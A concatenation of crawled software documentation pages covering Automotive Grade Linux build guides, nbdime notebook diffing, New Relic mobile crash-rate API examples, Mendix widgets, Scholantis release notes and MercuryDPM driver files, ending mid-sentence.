meta-agl-devel layer The meta-agl-devel layer is intended to contain components that are under testing/development or software packages that OEMs need but to not exist in AGL. Here below you can find more information about the components of this layer. Virtualization support (meta-egvirt) meta-egvirt is the Virtualization Expert Group (EG-VIRT) layer, targeting to enable virtualization support in AGL. For more information, see the README.md file included in the layer, or alternatively visit the EG_VIRT wiki page at: The OEM needs library for AGL There are some software package that the OEM needs, but not exist in the AGL source. This layer is add OEM needs library for AGL. The software packages list: * Quick start guide To Add these library by add the feature ‘agl-oem-extra-libs’ - Before build you need prepare agl layers: - You can read it at meta-agl/README-AGL.md - build the agl-demo-platform with ‘agl-oem-extra-libs’: source meta-agl/scripts/aglsetup.sh -m qemux86-64 agl-demo [agl-appfw-smack] [agl-devel] [agl-netboot] agl-oem-extra-libs - Build agl-demo-platform bitbake agl-demo-platform Supported Machines Reference hardware: - QEMU (x86-64) - emulated machine: qemux86-64 - Renesas R-Car Gen2 (R-Car M2) - machine: porter HMI Framework Quick start guide —————– To Add HMI Framework, it is necessary to add ‘hmi-framework’ at source command as same as agl-oem-extra-libs - Before build you need prepare agl layers: - You can read it at meta-agl/README-AGL.md - build the agl-demo-platform with ‘hmi-framework’: source meta-agl/scripts/aglsetup.sh -m m3ulcb agl-demo [agl-appfw-smack] [agl-devel] [agl-netboot] hmi-framework
http://docs.automotivelinux.org/docs/devguides/en/dev/reference/meta-agl-devel.html
2017-10-17T03:45:23
CC-MAIN-2017-43
1508187820700.4
[]
docs.automotivelinux.org
Create your first AGL application Setup Let’s use for example helloworld-native-application, so you need first to clone this project into a directory that will be accessible by xds-server. Depending of the project sharing method: - Cloud sync: you can clone project anywhere on your local disk, - Path mapping: you must clone project into $HOME/xds-workspacedirectory.. Clone project cd $HOME/xds-workspace git clone --recursive Declare project into XDS Use XDS Dashboard to declare your project. Open a browser and connect to XDS Dashboard. URL depends of your config, for example Click cog icon to open configuration panel and then create/declare a new project by with the plus icon of Projects bar. Set Sharing Type and paths according to your setup. Note: when you select Path mapping, you must clone your project into $HOME/xds-workspacedirectory (named “Local Path” in modal window) and “Server Path” must be set to /home/devel/xds-workspace/xxxwhere xxx is your project directory name. If you select Cloud Sync, you can clone your project where you want on your local disk. Build from XDS dashboard Open the build page (icon ), then select your Project and the Cross SDK you want to use and click on Clean / Pre-Build / Build / Populate buttons to execute various build actions. Build from command line You need to determine which is the unique id of your project. You can find this ID in project page of XDS dashboard or you can get it from command line using the --list option. This option lists all existing projects ID: xds-exec --list List of existing projects: CKI7R47-UWNDQC3_myProject CKI7R47-UWNDQC3_test2 CKI7R47-UWNDQC3_test3 Now to refer your project, just use –id option or use XDS_PROJECT_ID environment variable. You are now ready to use XDS to for example cross build your project. Here is an example to build a project based on CMakefile: # Add xds-exec in the PATH export PATH=${PATH}:/opt/AGL/bin # Go into your project directory cd $MY_PROJECT_DIR # Create a build directory xds-exec --id=CKI7R47-UWNDQC3_myProject --sdkid=poky-agl_aarch64_4.0.1 --url= -- mkdir build # Generate build system using cmake xds-exec --id=CKI7R47-UWNDQC3_myProject --sdkid=poky-agl_aarch64_4.0.1 --url= -- cd build && cmake .. # Build the project xds-exec --id=CKI7R47-UWNDQC3_myProject --sdkid=poky-agl_aarch64_4.0.1 --url= -- cd build && make all To avoid to set project id, xds server url, … at each command line, you can define these settings as environment variable within an env file and just set --config option or source file before executing xds-exec. For example, the equivalence of above command is: # MY_PROJECT_DIR=/home/seb/xds-workspace/helloworld-native-application cd $MY_PROJECT_DIR cat > xds-project.conf << EOF export XDS_SERVER_URL=localhost:8000 export XDS_PROJECT_ID=CKI7R47-UWNDQC3_myProject export XDS_SDK_ID=poky-agl_corei7-64_4.0.1 EOF xds-exec --config xds-project.conf -- mkdir build # Or sourcing env file source xds-project.conf xds-exec -- mkdir -o build && cd build && cmake .. xds-exec -- cd build && make all Note: all parameters after a double dash (–) are considered as the command to execute on xds-server. Build from IDE First create the XDS config file that will be used later by xds-exec commands. For example we use here aarch64 SDK to cross build application for a Renesas Gen3 board. # create file at root directory of your project # for example: # MY_PROJECT_DIR=/home/seb/xds-workspace/helloworld-native-application cat > $MY_PROJECT_DIR/xds-gen3.conf << EOF export XDS_SERVER_URL=localhost:8000 export XDS_PROJECT_ID=cde3b382-9d3b-11e7_helloworld-native-application export XDS_SDK_ID=poky-agl_aarch64_4.0.1 EOF NetBeans Netbeans 8.x : - Open menu Tools -> Options Open C/C++ tab, in Build Tools sub-tab, click on Add button: Then, you should set Make Command and Debugger Command to point to xds tools: Finally click on OK button. Open menu File -> New Project Select C/C++ Project with Existing Sources ; Click on Next button Specify the directory where you cloned your project and click on Finish button to keep all default settings: Edit project properties (using menu File -> Project Properties) to add a new configuration that will use XDS to cross-compile your application for example for a Renesas Gen3 board) in Build category, click on Manage Configurations button and then New button to add a new configuration named for example “Gen3 board” Click on Set Active button - Select Pre-Build sub-category, and set: - Working Directory: build_gen3 - Command Line: xds-exec -c ../xds-gen3.conf -- cmake -DRSYNC_TARGET=root@renesas-gen3 -DRSYNC_PREFIX=/opt .. - Pre-build First: ticked - Select Make sub-category, and set: - Working Directory: build_gen3 - Build Command: xds-exec -c ../xds-gen3.conf -- make remote-target-populate - Clean Command: xds-exec -c ../xds-gen3.conf -- make clean - Select Run sub-category, and set: - Run Command: target/[email protected] - Run Directory: build-gen3 - Click on OK button to save settings By changing configuration from Default to Gen3 board, you can now simply compile your helloworld application natively (Default configuration) or cross-compile your application through XDS for a Renesas Gen3 board (Gen3 board configuration). Visual Studio Code Open your project in VS Code cd $MY_PROJECT_DIR code . & Add new tasks : press Ctrl+Shift+P and select the Tasks: Configure Task Runner command and you will see a list of task runner templates. And define your own tasks, here is an example to build unicens2-binding AGL binding based on cmake (options value of args array must be updated regarding your settings): { "version": "0.1.0", "linux": { "command": "/opt/AGL/bin/xds-exec" }, "isShellCommand": true, "args": [ "-url", "localhost:8000", "-id", "CKI7R47-UWNDQC3_myProject", "-sdkid", "poky-agl_aarch64_4.0.1", "--" ], "showOutput": "always", "tasks": [{ "taskName": "clean", "suppressTaskName": true, "args": [ "rm -rf build/* && echo Cleanup done." ] }, { "taskName": "pre-build", "isBuildCommand": true, "suppressTaskName": true, "args": [ "mkdir -p build && cd build && cmake -DRSYNC_TARGET=root@renesas-gen3 -DRSYNC_PREFIX=/opt" ] }, { "taskName": "build", "isBuildCommand": true, "suppressTaskName": true, "args": [ "cd build && make widget" ], "problemMatcher": { "owner": "cpp", "fileLocation": ["absolute"], "pattern": { "regexp": "^(.*):(\\d+):(\\d+):\\s+(warning|error):\\s+(.*)$", "file": 1, "line": 2, "column": 3, "severity": 4, "message": 5 } } }, { "taskName": "populate", "suppressTaskName": true, "args" : [ "cd build && make widget-target-install" ] } ] } Note: You can also add your own keybindings to trig above tasks," }, More details about VSC keybindings here More details about VSC tasks here Qt Creator Please refer to agl-hello-qml project. Thanks to Dennis for providing this useful example. Others IDE
http://docs.automotivelinux.org/docs/devguides/en/dev/reference/xds/part-1/4_build-first-app.html
2017-10-17T03:56:07
CC-MAIN-2017-43
1508187820700.4
[array(['./pictures/xds-dashboard-prj-1.png', None], dtype=object) array(['./pictures/xds-dashboard-prj-2.png', None], dtype=object)]
docs.automotivelinux.org
Draft version of documentation under development may change! Click here for the latest released version. Building the AGL Demo Platform for Raspberry Pi Raspberry Pi 3 To build AGL demo platform for Raspberry Pi 3 use machine raspberrypi3 and feature agl-demo: source meta-agl/scripts/aglsetup.sh -m raspberrypi3 agl-demo agl-netboot agl-appfw-smack bitbake agl-demo-platform Raspberry Pi 2 To build AGL demo platform for Raspberry Pi 2 use machine raspberrypi2 and feature agl-demo: source meta-agl/scripts/aglsetup.sh -m raspberrypi2 agl-demo agl-netboot agl-appfw-smack bitbake agl-demo-platform Booting AGL Demo Platform on Raspberry Pi Follow the steps below to copy the image to microSD card and to boot it on Raspberry Pi 2 or 3: - Connect your sdcard in your linux machine. - Copy output image from build machine to linux machine that is connected your sdcard. (Often, those are same machines) - Output Image location in build machine for Raspberry Pi 2: tmp/deploy/images/raspberrypi2/agl-demo-platform-raspberrypi2.rpi-sdimg - Output Image location in build machine for Raspberry Pi 3: tmp/deploy/images/raspberrypi3/agl-demo-platform-raspberrypi3.rpi-sdimg - Unmount the microSD card and after that flash output image to it card with root user: Note: the sdimage files can also be named rpi-sdimg-ota in case you have the “agl-sota” feature enabled sudo umount [sdcard device] sudo dd if=[output image] of=[sdcard device] bs=4M sync - Plug your microSD card into Raspberry Pi 2 or 3 and boot the board
http://docs.automotivelinux.org/docs/getting_started/en/dev/reference/machines/raspberrypi.html
2017-10-17T03:49:55
CC-MAIN-2017-43
1508187820700.4
[]
docs.automotivelinux.org
If you want search for every string that starts with “x”, “ht” or “u” and ends with “ml”, you can write a regular expression like this: (x|ht|u)ml. Insert this expression in the search editor, click , and enable regular expressions by toggling the button. Please note that using regular expressions lets you to make very complicated searches, but the cost could be a performance degradation. Regular expression can be very tricky, and it is often the case that “if you want to solve a problem with a regular expression, you have two problems”.
https://docs.kde.org/stable4/en/kdewebdev/kfilereplace/kfilereplace-QT-regexp.html
2017-10-17T03:48:25
CC-MAIN-2017-43
1508187820700.4
[array(['/stable4/common/top-kde.jpg', None], dtype=object)]
docs.kde.org
nbdime – diffing and merging of Jupyter Notebooks¶ Version: 0.4.0.dev nbdime provides tools for diffing and merging Jupyter notebooks. Figure: nbdime example Why is nbdime needed?¶ Jupyter notebooks are useful, rich media documents stored in a plain text JSON format. This format is relatively easy to parse. However, primitive line-based diff and merge tools do not handle well the logical structure of notebook documents. These tools yield diffs like this: Figure: diff using traditional line-based diff tool nbdime, on the other hand, provides “content-aware” diffing and merging of Jupyter notebooks. It understands the structure of notebook documents. Therefore, it can make intelligent decisions when diffing and merging notebooks, such as: - eliding base64-encoded images for terminal output - using existing diff tools for inputs and outputs - rendering image diffs in a web view - auto-resolving conflicts on generated values such as execution counters nbdime yields diffs like this: Figure: nbdime’s content-aware diff Quickstart¶ To get started with nbdime, install with pip: pip install nbdime And you can be off to the races by diffing notebooks in your terminal with nbdiff: nbdiff notebook_1.ipynb notebook_2.ipynb or viewing a rich web-based rendering of the diff with nbdiff-web: nbdiff-web notebook_1.ipynb notebook_2.ipynb For more information about nbdime’s commands, see Console commands. Git integration quickstart¶ Many of us who are writing and sharing notebooks do so with git and GitHub. Git doesn’t handle diffing and merging notebooks very well by default, but you can configure git to use nbdime and it will get a lot better. The quickest way to get set up for git integration is to call: nbdime config-git --enable --global New in version 0.3: nbdime config-git. Prior to 0.3, each nbdime entrypoint had to enable git integration separately. This will enable the both the drivers and the tools for both diff and merge. Now when you do git diff or git merge with notebooks, you should see a nice diff view, like this: Figure: nbdime’s ‘content-aware’ command-line diff To use the web-based GUI viewers of notebook diffs, call: nbdime-web [ref [ref]] New in version 0.3: support for passing git refs to nbdime commands Figure: nbdime’s content-aware diff If you have a merge conflict in a notebook, the merge driver will ensure that the conflicted notebook is a valid notebook that can be viewed in the normal notebook viewer. In it, the conflicts will be marked similarly to how git would normally indicate conflicts, and they can be resolved manually. Alternatively, nbdime provides a web-base mergetool for visualizing and resolving merge conflicts, and it can be launched by calling: nbdime mergetool Figure: nbdime’s merge with web-based GUI viewer For more detailed information on integrating nbdime with version control, see Version control integration. Contents¶ Installation and usage Development Acknowledgements¶ nbdime is developed with financial support from: - OpenDreamKit Horizon 2020 European Research Infrastructures project (#676541), . - The Gordon and Betty Moore Foundation through Grant GBMF #4856,by the Alfred P. Sloan Foundation and by the Helmsley Trust.
http://nbdime.readthedocs.io/en/latest/
2017-10-17T03:44:17
CC-MAIN-2017-43
1508187820700.4
[array(['_images/nbdiff-web.png', 'example of nbdime nbdiff-web'], dtype=object) array(['_images/diff-bad-shortened.png', 'diff example using traditional line-based diff tool'], dtype=object) array(['_images/nbdiff-web.png', "example of nbdime's content-aware diff"], dtype=object) array(['_images/nbdiff-terminal.png', "nbdime's command-line diff"], dtype=object) array(['_images/nbdiff-web.png', "example of nbdime's content-aware diff"], dtype=object) array(['_images/nbmerge-web.png', "nbdime's merge with web-based GUI viewer"], dtype=object)]
nbdime.readthedocs.io
). Get SQL Server Data Tools To install SQL Server Data Tools (SSDT), see Download SQL Server Data Tools (SSDT). Create a package in SQL Server Data Tools using the Package Template. Note You can save an empty package. Choose the target version of a project and its packages In Solution Explorer, right-click on an Integration Services project and select Properties to open the property pages for the project. On the General tab of Configuration Properties, select the TargetServerVersion property, and then choose SQL Server 2016, SQL Server 2014, or SQL Server 2012. You can create, maintain, and run packages that target SQL Server 2016, SQL Server 2014, or SQL Server 2012.
https://docs.microsoft.com/en-us/sql/integration-services/create-packages-in-sql-server-data-tools
2017-10-17T04:54:51
CC-MAIN-2017-43
1508187820700.4
[]
docs.microsoft.com
This describes how to use the New Relic REST API (v2) to get your Mobile application's overall and version-specific crash count and crash rate, which appear on the Mobile Overview page in the upper right corner. These examples use the default time period of the last 30 minutes. To obtain crash data for a different time range, add the time period to the commands. You can also use the New Relic API Explorer to retrieve Mobile metric data. Contents Prerequisites To use the API in these examples, you need: - Your New Relic REST API key - Your New Relic Mobile application ID or your Mobile application version ID. To find the Mobile application ID, see Finding the product ID: Mobile. To find the Mobile application version ID, see Find the Mobile app version ID below. Mobile app: Get crash data To obtain crash count and crash rate data for the overall Mobile application, use the Mobile application ID in the following REST API command: curl -X GET "{MOBILE_ID}.json" \ -H "X-Api-Key:${API_KEY}" -i The crash_summary output data contains both the crash_count and crash_rate. "crash_summary": { "supports_crash_data": true, "unresolved_crash_count": 14, "crash_rate": 28.155339805825243 } To obtain crash summary data for all the mobile applications in the account, use this REST API command: curl -X GET "" \ -H "X-Api-Key:${API_KEY}" -i Mobile app version: Get crash count data To obtain the crash count metric data for a specific version of the Mobile application, include the Mobile application version ID in the following REST API command: curl -X GET "{MOBILE_APP_VERSION}/metrics/data.json" \ -H "X-Api-Key:${API_KEY}" -i \ -d 'name=Mobile/Crash/All&values[]=call_count&summarize=true' Mobile app version: Get crash rate data To calculate a specific version's crash rate, use the following equation: Crash Rate = (Mobile/Crash/All:call_count) / (Session/Start:call_count) To get the two metric values needed in the equation, use the following REST API command with the Mobile application version ID . curl -X GET "{MOBILE_APP_VERSION}/metrics/data.json" \ -H "X-Api-Key:${API_KEY}" -i \ -d 'names[]=Mobile/Crash/All&names[]=Session/Start&values[]=call_count&summarize=true' Find the Mobile app version ID You must provide the version ID only when you want to obtain crash data for a specific version. You can find the Mobile application version ID from the Mobile Overview page: - Go to rpm.newrelic.com/mobile > (select an app) > Versions. Locate the Mobile application version ID in the URL that your browser shows when viewing the application version:{ACCOUNT_ID}/mobile/${MOBILE_APP_VERSION} For more help Additional documentation resources include: - Getting started with the New Relic REST API (v2) (overview of the New Relic REST API, including the structure of an API call) - Using the API Explorer (using the API Explorer's user interface to get data in and data out of New Relic
https://docs.newrelic.com/docs/apis/rest-api-v2/mobile-examples-v2/mobile-crash-count-crash-rate-example-v2
2020-07-02T16:50:29
CC-MAIN-2020-29
1593655879532.0
[]
docs.newrelic.com
MessageType Overview This enum contains the possible message types that client and server can send to each other. Messages of different types have different meaning in the same messaging protocol. The concrete messaging protocol can limit the number of message types supported. Dealing with message type is encapsulated in the library or generated code and never exposed to users. Location - Reference: RemObjects.SDK.dll - Namespace: RemObjects.SDK
https://docs.remotingsdk.com/API/NET/Enums/MessageType/
2020-07-02T15:28:01
CC-MAIN-2020-29
1593655879532.0
[]
docs.remotingsdk.com
3. Guides¶ This section contains several guides explaining how to do certain things by using the plugin. These are just a collection of the instructions already available in the documentation. Not everything that can be done in the plugin is listed here. Although the names of the settings of WP Content Crawler are generally self-explanatory, you can refer to the documentations of the settings if you cannot find the guide you are looking for here. Interactive guides The plugin has interactive guides as well. You can reach the interactive guides by clicking to Guides button shown at the bottom right corner of the pages of the plugin. To start the guide or one of its steps, just click its play button. Note that not every guide listed here is available as an interactive guide. So, if you cannot find the guide you are looking for as an interactive guide, you can check this page to see if it is available here. Contents - 3.1. Creating site settings to crawl a site - 3.2. Saving posts automatically - 3.3. Updating posts automatically - 3.4. Translating posts automatically - 3.5. Spinning posts automatically - 3.6. Deleting posts automatically - 3.7. Using cookies - 3.8. Increasing speed of tests in site settings page - 3.9. Using custom general settings for a site - 3.10. Adding category URLs automatically - 3.11. Duplicating site settings - 3.12. Manually saving posts - 3.13. Manually updating posts - 3.14. Tracking saved posts - 3.15. Getting notified when selectors cannot find a value - 3.16. Testing site settings - 3.17. Collecting post URLs from multiple pages of a category - 3.18. Saving multi-page posts - 3.19. Saving list-type posts - 3.20. Saving post meta (custom fields) - 3.21. Saving taxonomy values - 3.22. Creating post categories automatically - 3.23. Saving posts as custom post types - 3.24. Disabling fixed navigation and tabs in site settings page - 3.25. Saving post title - 3.26. Saving post excerpt - 3.27. Saving post content - 3.28. Saving post tags - 3.29. Saving post permalink (slug) - 3.30. Saving post date - 3.31. Saving the featured image of a post - 3.32. Saving images in post content - 3.33. Saving lazy-loaded images - 3.34. Defining custom short codes to use anything in templates - 3.35. Saving WooCommerce products - 3.36. Saving featured images from category pages - 3.37. Defining how posts are marked as duplicate - 3.38. Adding/removing things to/from post content - 3.39. Adding/removing things to/from post title - 3.40. Adding/removing things to/from post excerpt - 3.41. Saving posts as draft or pending (defining post status) - 3.42. Setting the author of the posts - 3.43. Removing the links in post content - 3.44. Showing iframes in post content - 3.45. Showing scripts in post content - 3.46. Creating a gallery of images or files in post content - 3.47. Taking notes about site settings - 3.48. Changing something in every page of every site - 3.49. Removing an HTML element from post content - 3.50. Dealing with character encoding problems - 3.51. Using proxies - 3.52. Adding/removing/changing things in target page - 3.53. Limiting maximum tags posts can have - 3.54. Setting password to posts - 3.55. Setting HTTP User Agent and HTTP Accept values - 3.56. Manually adding post URLs - 3.57. Deleting post URLs of a site
https://docs.wpcontentcrawler.com/guides/index.html
2020-07-02T15:01:21
CC-MAIN-2020-29
1593655879532.0
[]
docs.wpcontentcrawler.com
Overview This feature is can be useful for instant raytracing of fast-moving objects. Normally, a physics proxy will be one frame ahead of the render geometry due to multithreading, which means aiming at the render proxy can miss. Also, pe_status_pos will be guaranteed to return the same coordinates that were set by a preceding pe_params_pos, even if the command was queued and hasn't been fully executed yet. ... To use these coordinates in RWI, PWI, and GEA, ent_use_sync_coords must be set in objtypes. To use them in pe_status_pos, status_use_sync_coords must be set in flags. By default sync coords are not enabled and not used. Overview Content Tools
https://docs.cryengine.com/pages/diffpages.action?originalId=44967751&pageId=44964142
2020-07-02T14:44:21
CC-MAIN-2020-29
1593655879532.0
[]
docs.cryengine.com
sstabledowngrade Downgrades the SSTables in the given table or snapshot to the version of Cassandra compatible with the current version of DSE. cassandra.yamlThe location of the cassandra.yaml file depends on the type of installation: Downgrades the SSTables in the given table or snapshot to the version of OSS Apache Cassandra™ that is compatible with the current version of DSE. Important: The sstabledowngrade command cannot be used to downgrade system tables or downgrade DSE versions. Synopsis sstabledown. - --sstable-files - Instead of processing all SSTables in the default data directories, process only the tables specified via this option. If a single SSTable file, only that SSTable is processed. If a directory is specified, all SSTables within that directory are processed. Snapshots and backups are not supported with this option. - Dowgrade events table in the cycling keyspace sstabledowngrade cycling events Found 1 sstables to rewrite. Rewriting TrieIndexSSTableReader(path='/var/lib/cassandra/data/cycling/events-2118bc7054af11e987feb76774f7ab56/aa-1-bti-Data.db') to BIG/mc. Rewrite of TrieIndexSSTableReader(path='/var/lib/cassandra/data/cycling/events-2118bc7054af11e987feb76774f7ab56/aa-1-bti-Data.db') to BIG/mc complete.
https://docs.datastax.com/en/dse/6.0/dse-dev/datastax_enterprise/tools/toolsSStables/ToolsSSTabledowngrade.html
2020-07-02T15:29:55
CC-MAIN-2020-29
1593655879532.0
[]
docs.datastax.com
Defaults represent the concept of “globals” in the system. Administrative users can define several different types of defaults, which can be overwritten at the Domain and User level. To access defaults, go to the provisioning section of the product. Click the “Manage By” pulldown, and then select “Defaults”. This view will show several categories: Default values are Required When restoring an edgeSuite v2.1 archive inside of edgeCore v3.0, all Secured Variables and Credentials MUST have test or default values configured. Name: *
https://docs.edge-technologies.com/docs/edgecore-defaults/
2020-07-02T14:50:05
CC-MAIN-2020-29
1593655879532.0
[]
docs.edge-technologies.com
1 Introduction The data view is a central component of Mendix applications. It is the starting point for showing the contents of exactly one object. For example, if you want to show the details of a single customer, you can use a data view to do this. The data view typically contains input widgets like text boxes with labels. In more complex screens, a data view can contain tab controls per topic (for example, address and payment information) and data views and data grids for related objects (for example, order history or wish list). A more advanced data view with a tab control and a data grid inside. 2 Components 2.1 Data View Contents Area The data view contents area is where all the layout and input widgets go. Often the contents area contains a table with two columns: the first column showing labels and the second column containing input widgets. Other layouts are possible, as you can see in the examples above. 2.2 Data View Footer The footer of the data view is the section at the bottom of the data view that often contains buttons to confirm or cancel the page. However, arbitrary widgets are allowed. The footer will stick to the bottom if the data view is the only top-level widget. 4 General Properties value: Horizontal value: 3 4.3 Show Footer With this property, you can specify whether you want the footer of the data view to be visible. The footer of nested data views is always invisible, regardless of the value of this property. Default value: True. value: empty 5 Editability Properties 5.1 Editable The editable property indicates whether the data view as a whole is editable or not. If the data view is not editable, no widget inside the data view will be editable. On the other hand, if the data view is editable, each widget is determined to be editable based on its own editable property. Default value: True 5.2 Read-Only Style This property determines how input widgets are rendered if read-only. Default value: Control 6 Data Source Properties The data source determines which object will be shown in the data view. For general information about data sources, see Data Sources. 6.1 Type The data view supports the following types of data source: context, microflow, and listen to widget. Whatever data source you select, the data view will always return one single object. 6.2 Entity, Microflow, Listen To Widget See the corresponding data source for specific properties: - Context source - either a page parameter or a surrounding data element - Microflow source - a microflow returning only one object - Listen to widget source - any widget returning only one object 6.3 Use Schema This property has been deprecated in version 7.2.0 and is marked for removal in version 8.0.0. Curently this has no effect. 7.
https://docs.mendix.com/refguide7/data-view
2020-07-02T15:54:43
CC-MAIN-2020-29
1593655879532.0
[array(['attachments/pages/data-view.png', None], dtype=object) array(['/refguide7/attachments/pages/show-styles.png', 'Location and effect of the Show styles button'], dtype=object)]
docs.mendix.com
It is publicly inherited from class Files. It defines an awesome feature that is ideal when doing a parameter study. Below are the routines that manipulate a counter file, called COUNTER_DONOTDEL, to store run numbers. More... #include <FilesAndRunNumber.h> It is publicly inherited from class Files. It defines an awesome feature that is ideal when doing a parameter study. Below are the routines that manipulate a counter file, called COUNTER_DONOTDEL, to store run numbers. For a paramater study, a particular DPM simulation is run several times. Each time the code is executed, the run number or counter, in the COUNTER_DONOTDEL, gets incremented. Based on the counter your file name is named as problemName.1.data, problemName.2.data... If the File::fileType_ is chosen as Multiple files, then the your data files will have the name as problemName.runNumber.0, problemName.runNumber.1 ... Definition at line 52 of file FilesAndRunNumber.h. Constructor. Definition at line 38 of file FilesAndRunNumber.cc. References constructor(). Copy constructor. Definition at line 49 of file FilesAndRunNumber.cc. References runNumber_. Constructor. Definition at line 61 of file FilesAndRunNumber.cc. The autoNumber() function is the trigger. It calls three functions. setRunNumber(), readRunNumberFromFile() and incrementRunNumberInFile(). Definition at line 79 of file FilesAndRunNumber.cc. References incrementRunNumberInFile(), readRunNumberFromFile(), and setRunNumber(). Referenced by DPMBase::readNextArgument(). a function called by the FilesAndRunNumber() (constructor) Initialises the runNumber_ = 0 Definition at line 71 of file FilesAndRunNumber.cc. References runNumber_. Referenced by FilesAndRunNumber(). This turns a counter into two indices which is an amazing feature for doing two dimensional parameter studies. The indices run from 1:size_x and 1:size_y, while the study number starts at 0 ( initially the counter=1 in COUNTER_DONOTDEL) Lets say size_x = 2 and size_y = 5, counter stored in COUNTER_DONOTDEL =1. The study_size = 10. Substituting these values into the below algorithm implies that study_num = 0 or 1, everytime the code is executed the counter gets incremented and hence determined the values of study_num, i and j which is returned as a std::vector<int> Definition at line 193 of file FilesAndRunNumber.cc. References getRunNumber(). This returns the current value of the counter (runNumber_) Definition at line 143 of file FilesAndRunNumber.cc. References runNumber_. Referenced by get2DParametersFromRunNumber(), and DPMBase::solve(). Increment the run Number (counter value) stored in the file_counter (COUNTER_DONOTDEL) by 1 and store the new value in the counter file. In order to increment the counter stored in COUNTER_DONOTDEL, we initialise two fstream objects counter_file, counter_file2 and an integer type temp_counter. First we open the file COUNTER_DONOTDEL, check if everything went fine with the opening. If yes, we extract the runNumber (counter) into the temp_counter. Increment the temp_counter and then write it into COUNTER_DONOTDEL. This is how we increment the counter in the file. Definition at line 154 of file FilesAndRunNumber.cc. Referenced by autoNumber(). This launches a code from within this code. Please pass the name of the code to run. Definition at line 220 of file FilesAndRunNumber.cc. Accepts an input stream std::istream. Definition at line 230 of file FilesAndRunNumber.cc. References Files::read(), and runNumber_. Referenced by DPMBase::read(). Read the run number or the counter from the counter file (COUNTER_DONOTDEL) The procedure below reads the counter in from a file stored on the disk. Increments the number stored on the disk and then returns the current counter. Definition at line 89 of file FilesAndRunNumber.cc. Referenced by autoNumber(). This sets the counter/Run number, overriding the defaults. Definition at line 135 of file FilesAndRunNumber.cc. References runNumber_. Referenced by autoNumber(), and DPMBase::readNextArgument(). Accepts an output stream read function, which accepts an input stream std::ostream. Definition at line 242 of file FilesAndRunNumber.cc. References runNumber_, and Files::write(). Referenced by DPMBase::write(). This stores the run number for saving. Definition at line 131 of file FilesAndRunNumber.h. Referenced by constructor(), FilesAndRunNumber(), getRunNumber(), read(), setRunNumber(), and write().
http://docs.mercurydpm.org/Beta/d9/de3/classFilesAndRunNumber.html
2020-07-02T15:28:22
CC-MAIN-2020-29
1593655879532.0
[]
docs.mercurydpm.org
Pressing the sidebar toggle button will make a region of a scroll container appear or disappear. This makes it possible to create sidebars (for example, a menu on a mobile phone that is hidden by default and can be shown by clicking the button). See the image below for an example layout that used the sidebar toggle. The sidebar toggle used to include settings to govern which layout region was toggled and how the transition was visualized. These configuration options were moved to the scroll container region to improve transparency in Mendix 6.10. .
https://docs.mendix.com/refguide6/sidebar-toggle-button
2020-07-02T16:53:05
CC-MAIN-2020-29
1593655879532.0
[array(['attachments/16713866/16843980.png', None], dtype=object)]
docs.mendix.com
- 2016 update (4.16) will be deployed on Thursday, August 18th. During the update your sites will be unavailable for a few minutes at 5:00 pm local time. Don't forget about Assignments 3.0, Portfolio export and all the other great features available for the new school year. Notifications It's a game changer when you can instantly see what's happening anywhere on your portal. Here are a few examples of what you can expect to see in your notification feed: - Teachers can see when students turn in an assignment, create portfolios posts or comment on their student blogs. - Staff will see new memos, changes to events, notices about edited documents or replies to discussions. - Students find out when assignments have been graded, class announcements have been posted or teachers have commented on their work. Access the notification bell anywhere on your portal to see activity from the district, departments, schools, staff rooms, classes, groups, portfolios or blogs. View and filter notifications to see a specific site or notification type, and quickly mute sites with too much activity. Student Information - Maplewood, PowerSchool, MyEducation BC We are thrilled to announce the availability of Scholantis SIS Data Sync. This feature allows teachers to see their classes and work with students more easily than ever before. Once sync is enabled, you'll see your class list when creating or modifying your class site. Add all your students to your class site with a single click. SIS Data Sync is being released as a public beta; however, once it's enabled. Copy from the Cloud The new file picker lets you copy files from Google or Office 365 into document libraries or rich text areas. When viewing publications or shared documents you'll see a new Copy from Cloud option in the Insert tab. You'll also see it when editing rich text on pages, announcements or other list items. Other Enhancements SRB atrieveERP Authentication - Support for SRB Atrieve Scanning Module on portals using ADFS authentication. We have been working with the atrieveERP team to ensure the best possible experience for our shared customers. Portfolio Teacher Drafts - Teachers can now create posts that are hidden from students by locking the post and setting the post date into the future. Minor Fixes, Changes & Technical Notes - Portfolio export - Attachments in non-standard paths are now correctly exported. - Feedback tool - Feedback tool no longer blocks emails that are not verified in Scholantis support. - Bus Alert - Bus alerts displayed in a school now link to the school's schedule page instead of the district's. - Buy and Sell - Minor cosmetic improvements have been made to the Buy and Sell archive page.. User Group - Sign up now for the SharePoint for K-12 User Group to discuss new features, access the Scholantis Preview Site and get help from the community. Technical User Group Meeting - On November 16th we will be hosting an in-person user group for technical contacts in Vancouver. More details to follow. - Improved Document Editing - Office Online 2016 Server is now available and provides some great improvements for editing and co-authoring documents in SharePoint 2013. Get in touch with Scholantis to get the update. - Memos - Learn how to share important notices, directives and memos with your staff in a targeted and relevant way. Now integrated with notifications to let staff see when important items are posted! If you have comments on any new features or regarding the update process itself, please get in touch or use the feedback form in your site (look for the speech bubble).
https://docs.scholantis.com/display/RRN/4.16+Release+Notes
2020-07-02T14:51:11
CC-MAIN-2020-29
1593655879532.0
[]
docs.scholantis.com
A driver file usually contains a class derived from Mercury3D in which the concrete parameters of the application are defined, such as species, particles, walls, boundaries, time step, ..., and a main function where the class is declared and the time integration routine (solve) is called. Thus, the basic setup looks like this: This file defines a class named Example, that is derived from Mercury3D. It overrides the function setupInitialConditions (which is empty by default) with a function where the simulation objects (particles, walls, boundaries, species) are defined. Then the main function is defined (which is the function that is executed when you run the executable): First, the Example class is instantiated (a concrete instance of the class is created and stored in memory). Then, the global variables are set, such as name, gravity, spatial/temporal domain. Finally, the time integration routine (solve) is called. The following global variables should be set: The first command sets the name variable to Example, so the output files will be named Example.data, Example.restart, ... The next six commands set the dimensions of the system that are used in displaying the output. Finally, the final time and the time step are set. There are additional global parameters that can be set here, such as A species can be defined as follows: Other contact laws are possible; see the documentation of Species for more details. A particle can be defined as follows: See the documentation of BaseParticle for more details. A planar bottom wall at the bottom of the domain can be defined as follows: Other walls are possible; see the documentation of WallHandler for more details. A periodic boundary in x-direction can be defined as follows: Other boundaries are possible; see the documentation of BoundaryHandler for more details. In some cases it is not enough to define suitable initial conditions. This is done by overriding certain functions in the Mercury3D class, just as we are overriding setupInitialConditions. For example, to define a criterium to stop the simulation, one can override the In this case, the simulation is stopped as soon as the kinetic energy drops below 0.00001 times the elastic energy stored in the contact springs (a useful criteria to determine arresting flow). For more examples, see Overriding functions. While the above example works, we advise you to avoid the number of explicitly used parameters such as the tolerance \(1e-5\) inside the class definition. A good coding 